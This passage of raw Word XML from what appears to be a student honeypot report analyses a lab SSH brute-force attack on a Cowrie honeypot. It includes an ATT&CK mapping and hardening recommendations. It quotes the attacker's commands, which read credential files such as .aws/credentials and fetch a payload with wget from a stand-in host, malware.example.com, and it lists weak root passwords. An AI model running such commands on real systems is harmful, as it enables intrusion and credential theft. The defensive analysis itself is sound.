              <w:t>Honeypot Type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D52519" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Cowrie SSH Honeypot</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="5E385E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56BAC2" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>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478EA7" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Ubuntu Server 22.04 LTS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="001C6C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39DB3A3" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Deployment Period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4014763" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>May–June 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="76A1D8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725B98" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Total Sessions Logged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30CFD5" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>9 successful sessions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="7AEDCF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A022476" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Successful Logins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3DA4F2" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="0DED7B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32B7F7" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Unique Attacker IPs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C82985" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>1 — 192.168.56.26 (Kali VM)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="6C3708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AB81E2B" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Countries of Origin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6A471E" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Lab simulation — internal network (192.168.56.0/24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="16410AED" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="0062444D"/>
    <w:p w14:paraId="57418987" w14:textId="77777777" w:rsidR="0040162F" w:rsidRDefault="0040162F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="52" w:name="_Toc231686586"/>
    </w:p>
    <w:p w14:paraId="7AB065AD" w14:textId="77777777" w:rsidR="0040162F" w:rsidRDefault="0040162F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C196AFD" w14:textId="77777777" w:rsidR="004B5C58" w:rsidRDefault="004B5C58">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="584CEDA7" w14:textId="0845D95C" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>6.3 Attack Pattern Analysis</w:t>
      </w:r>
      <w:bookmarkEnd w:id="52"/>
    </w:p>
    <w:p w14:paraId="1A460B6B" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="53" w:name="_Toc231686587"/>
      <w:r>
        <w:t>Username Targeting</w:t>
      </w:r>
      <w:bookmarkEnd w:id="53"/>
    </w:p>
    <w:p w14:paraId="0C30C2FE" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Root was the exclusive target across all 9 login attempts — a 100% concentration consistent with findings from Rapid7's 2024 National Exposure Report, which documented root as the primary credential target in over 87% of SSH brute force campaigns globally. This confirms that attackers prioritise privileged access from first contact, bypassing standard user accounts entirely in favour of unrestricted system control.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B549D0" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="54" w:name="_Toc231686588"/>
      <w:r>
        <w:t>Credential Stuffing Profile</w:t>
      </w:r>
      <w:bookmarkEnd w:id="54"/>
    </w:p>
    <w:p w14:paraId="56DD8B99" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Four passwords were cycled repeatedly — root, password, 123456, and admin — all ranking within the ten </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>most commonly breached</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> passwords documented in the 2024 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>NordPass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Global Password Report. This confirms the attack relied on credential stuffing rather than sophisticated cryptographic cracking, exploiting the statistical certainty that a significant proportion of internet-facing servers retain default or weak credentials. Against a real production server, this four-password list would compromise any system where credential hygiene had not been enforced.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C416106" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="55" w:name="_Toc231686589"/>
      <w:r>
        <w:t>Post-Login Command Sequence</w:t>
      </w:r>
      <w:bookmarkEnd w:id="55"/>
    </w:p>
    <w:p w14:paraId="4333E0FF" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Following successful authentication, the attacker executed seven commands in a precise, repeatable sequence:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384B6ADB" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>uname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → cat /etc/passwd → cat /etc/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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mysql.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="404F33B1" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>→ cat /home/admin</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>aws</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">/credentials → </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> http://malware.example.com/shell.sh → exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397EE8DD" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>This sequence maps directly to the reconnaissance-then-harvest-then-deploy pattern documented in Datadog's 2023 Cloud Security Report, where 94% of attackers accessed cloud credential files within 60 seconds of SSH login. Three of the seven commands targeted credential files specifically, reflecting the same attack vector responsible for IBM's documented $4.88 million average breach cost in 2024.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B83EC6" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="56" w:name="_Toc231686590"/>
      <w:r>
        <w:t>Malware Deployment Attempt</w:t>
      </w:r>
      <w:bookmarkEnd w:id="56"/>
    </w:p>
    <w:p w14:paraId="3B4D1FA0" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> http://malware.example.com/shell.sh was executed immediately after credential harvesting — consistent with T1105 Ingress Tool Transfer in the MITRE ATT&amp;CK framework. The download failed due to DNS resolution failure on the example domain. In a live deployment this URL would reference an active command-and-control server delivering a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cryptominer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, ransomware dropper, or persistent backdoor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C313F8" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="57" w:name="_Toc231686591"/>
      <w:r>
        <w:t>Attack Timing and Automation Confirmation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="57"/>
    </w:p>
    <w:p w14:paraId="093E642F" w14:textId="58395433" w:rsidR="0062444D" w:rsidRDefault="00000000" w:rsidP="00EF35EC">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>All 65 events, including 9 successful logins and 7 post-login commands, were recorded at the identical timestamp — 22:38:15 UTC on 5th June 2026. The sub-second execution of multiple operations confirms fully automated tooling. In real-world deployments, Mandiant's 2024 M-Trends Report documents peak attack windows between 02:00 and 06:00 UTC, corresponding to business hours across Eastern European and Asian threat actor groups — a passive geolocation signal available to any organisation running honeypot infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4337C4E2" w14:textId="77777777" w:rsidR="004B5C58" w:rsidRDefault="004B5C58" w:rsidP="00EF35EC">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39961E50" w14:textId="18E7F1D9" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="58" w:name="_Toc231686592"/>
      <w:r>
        <w:t>6.4 MITRE ATT&amp;CK Mapping</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1"/>
        <w:gridCol w:w="2299"/>
        <w:gridCol w:w="3860"/>
      </w:tblGrid>
      <w:tr w:rsidR="0062444D" w14:paraId="3277B5DA"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4F15C897" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Tactic</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11BD276B" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Technique ID</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209DF031" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Technique Name</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661443BE" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Evidence Observed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="480253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5884044" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Initial Access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71642E6" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1110</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C11555C" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Brute Force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004822B" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>9 successful login attempts using root/root, root/password, root/123456, root/admin via Hydra/Medusa — all at 22:38:15 on 2026-06-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="5E6A53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4F478B" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Execution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787118" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1059</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977824" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Command and Scripting Interpreter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E8CF6C" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Attacker ran multiple shell commands after login including </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>uname</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>whoami</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, cat, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>wget</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> executed through bash shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="292AF1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0246D52" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Defence Evasion / Persistence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082B1EB" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1078</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0F030A8" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Valid Accounts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9875DED" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Attacker authenticated using legitimate-format credentials accepted by the honeypot across 9 sessions. Valid account use bypasses authentication controls, leaving no failed-login forensic trail without honeypot or SIEM monitoring.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="153A9D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760385" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Discovery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71F0A7" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1082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2A051E" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>System Information Discovery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13308E" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>uname</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> run immediately after login — first command in every session — to identify OS version and architecture</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="5D2CF9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4BB7F53" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Command &amp; Control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81036BF" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1105</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110FB95" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Ingress Tool Transfer</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902D76" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>wget</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> http://malware.example.com/shell.sh — attacker attempted to download a remote payload to establish command and control</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="217664EA" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="0062444D"/>
    <w:p w14:paraId="14918BE4" w14:textId="77777777" w:rsidR="00361CDB" w:rsidRDefault="00361CDB"/>
    <w:p w14:paraId="5C1A7B12" w14:textId="77777777" w:rsidR="00361CDB" w:rsidRDefault="00361CDB"/>
    <w:p w14:paraId="2AD37084" w14:textId="77777777" w:rsidR="00361CDB" w:rsidRDefault="00361CDB"/>
    <w:p w14:paraId="647CC856" w14:textId="77777777" w:rsidR="00361CDB" w:rsidRDefault="00361CDB"/>
    <w:p w14:paraId="1D6872FB" w14:textId="77777777" w:rsidR="00361CDB" w:rsidRDefault="00361CDB"/>
    <w:p w14:paraId="32D29B3B" w14:textId="77777777" w:rsidR="00361CDB" w:rsidRDefault="00361CDB"/>
    <w:p w14:paraId="292332D5" w14:textId="77777777" w:rsidR="00361CDB" w:rsidRDefault="00361CDB"/>
    <w:p w14:paraId="3857281F" w14:textId="77777777" w:rsidR="00361CDB" w:rsidRDefault="00361CDB"/>
    <w:p w14:paraId="515885A8" w14:textId="77777777" w:rsidR="00361CDB" w:rsidRDefault="00361CDB"/>
    <w:p w14:paraId="59157390" w14:textId="77777777" w:rsidR="00361CDB" w:rsidRDefault="00361CDB"/>
    <w:p w14:paraId="5F2156FA" w14:textId="77777777" w:rsidR="00361CDB" w:rsidRDefault="00361CDB"/>
    <w:p w14:paraId="3BE19E7F" w14:textId="77777777" w:rsidR="00361CDB" w:rsidRDefault="00361CDB"/>
    <w:p w14:paraId="747A4697" w14:textId="77777777" w:rsidR="00361CDB" w:rsidRDefault="00361CDB"/>
    <w:p w14:paraId="02E94D76" w14:textId="77777777" w:rsidR="00361CDB" w:rsidRDefault="00361CDB"/>
    <w:p w14:paraId="1957C3D8" w14:textId="77777777" w:rsidR="00361CDB" w:rsidRDefault="00361CDB"/>
    <w:p w14:paraId="5E99DC65" w14:textId="77777777" w:rsidR="00361CDB" w:rsidRDefault="00361CDB"/>
    <w:p w14:paraId="1A76D694" w14:textId="77777777" w:rsidR="00361CDB" w:rsidRDefault="00361CDB"/>
    <w:p w14:paraId="0517086F" w14:textId="77777777" w:rsidR="00361CDB" w:rsidRDefault="00361CDB"/>
    <w:p w14:paraId="1A82BDC7" w14:textId="77777777" w:rsidR="00361CDB" w:rsidRDefault="00361CDB"/>
    <w:p w14:paraId="560A2BE4" w14:textId="7EE52AC9" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="59" w:name="_Toc231686593"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>6.5 Security Recommendations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="59"/>
    </w:p>
    <w:p w14:paraId="5F429D39" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="60" w:name="_Toc231686594"/>
      <w:r>
        <w:t>Recommendation 1 — Disable Root SSH Authentication</w:t>
      </w:r>
      <w:bookmarkEnd w:id="60"/>
    </w:p>
    <w:p w14:paraId="199673EB" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Every attack captured in this deployment targeted the root account exclusively — a 100% concentration across all 9 login attempts. Root provides unrestricted system access, making it the highest-value target for automated credential stuffing tools. Organisations should enforce </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PermitRootLogin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> no in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sshd_config</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and require SSH key-based authentication, eliminating the attack surface that enabled every breach attempt recorded in this project.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE9BA8A" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="61" w:name="_Toc231686595"/>
      <w:r>
        <w:t>Recommendation 2 — Implement Automated Rate Limiting and Lockout</w:t>
      </w:r>
      <w:bookmarkEnd w:id="61"/>
    </w:p>
    <w:p w14:paraId="10A61481" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>All 9 login attempts occurred at the identical timestamp — 22:38:15 — confirming fully automated tooling cycling through credentials faster than any human monitoring system can respond. Fail2ban or equivalent rate-limiting controls configured to lock accounts after three failed attempts would have terminated this attack before a single successful login was recorded. Given that Rapid7 documents SSH brute force as the most common initial access technique globally, this control is not optional for any internet-facing service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09189025" w14:textId="77777777" w:rsidR="00066B00" w:rsidRDefault="00066B00">
